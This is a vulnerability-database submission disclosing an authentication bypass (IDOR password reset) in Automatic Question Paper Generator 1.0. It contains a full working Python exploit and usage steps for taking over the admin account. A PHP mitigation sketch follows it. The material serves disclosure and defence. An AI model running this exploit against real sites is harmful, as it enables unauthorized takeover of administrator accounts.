Submission #31977: Automatic Question Paper Generator System 1.0 - Authentication Bypass

Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass

Description: The Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password through an insecure direct object reference (IDOR) attack. For this reason, the attacker can have full access to the administrator account by resetting its password.

* Steps to Reproduce:

1. Create a python file and paste this code and save:

#######################################################
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse


def banner():
    # Raw string so the backslashes in the ASCII art are not read as escapes.
    print(r'''
    ___   ____   ____  ______
   /   | / __ \ / __ \/ ____/
  / /| |/ / / / / /_/ / / __
 / ___ / /_/ / / ____/ /_/ /
/_/  |_\___\_\/_/    \____/

    [Automatic Question Paper Generator v1.0]
    [Authentication Bypass]
    ''')


def main():
    fields = {
        'id': "1",
        'firstname': 'Adminstrator',
        'lastname': 'Admin',
        'username': 'admin',
        'password': arguments.newpassword
    }
    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
    m = MultipartEncoder(fields=fields, boundary=boundary)
    headers = {
        "Connection": "keep-alive",
        "Content-Type": m.content_type
    }
    r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
    if '1' in r.text:
        print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
    else:
        print('[-] Not vulnerable')


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)
    parser.add_argument('-p', '--password', action='store', help='New password', dest='newpassword', required=True)
    arguments = parser.parse_args()
    banner()
    sleep(2)
    main()
#######################################################

2. Run the command: python3 exploit.py -u http://target.com/aqpg/ -p newpassword

3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and log in using the admin:newpassword credentials. You will be logged into the administrator account.
Source: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
User: mrempy (UID 24379)
Submitted: 2022-03-05 18:13 (4 years ago)
Moderation: 2022-03-13 12:12 (8 days later)
Status: Accepted
VulDB Entry: 194839 [Automatic Question Paper Generator 1.0 privilege escalation]
Points: 20
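
A mitigation sketch for the flaw described in this submission, added here as an example and not taken from AQPG's source or from the submitter: the user-save handler refuses requests without an authenticated session and treats the posted id only as a request to be checked against that session. The function name and the session keys user_id and is_admin are assumptions, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

/**
 * Decide which user record the current request may write.
 * Returns the authorized id, or null when the request must be refused.
 * Hypothetical helper: the session keys 'user_id' and 'is_admin' are assumed.
 */
function authorized_target_id(array $session, array $post): ?int
{
    // 1. No authenticated session: refuse, whatever the request body says.
    if (!isset($session['user_id'])) {
        return null;
    }
    $sessionId = (int) $session['user_id'];

    // 2. The posted id is untrusted input; default to the caller's own record.
    $requested = filter_var($post['id'] ?? $sessionId, FILTER_VALIDATE_INT);
    if ($requested === false || $requested < 1) {
        return null;
    }

    // 3. Writing someone else's record needs the admin flag held server-side.
    if ($requested !== $sessionId && empty($session['is_admin'])) {
        return null;
    }
    return $requested;
}

// Constructed requests: [session data, posted form fields].
$cases = [
    'no session, id=1'        => [[], ['id' => '1']],
    'user 5 edits own record' => [['user_id' => 5], ['id' => '5']],
    'user 5 targets id=1'     => [['user_id' => 5], ['id' => '1']],
    'admin 1 edits user 5'    => [['user_id' => 1, 'is_admin' => true], ['id' => '5']],
    'malformed id'            => [['user_id' => 5], ['id' => '1 OR 1=1']],
];

foreach ($cases as $label => [$session, $post]) {
    $id = authorized_target_id($session, $post);
    printf("%-26s => %s\n", $label, $id === null ? 'refused (HTTP 403)' : "save id $id");
}
```

The first case corresponds to the request in the submission, which carries id=1 and no session and is refused before any password field is read.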
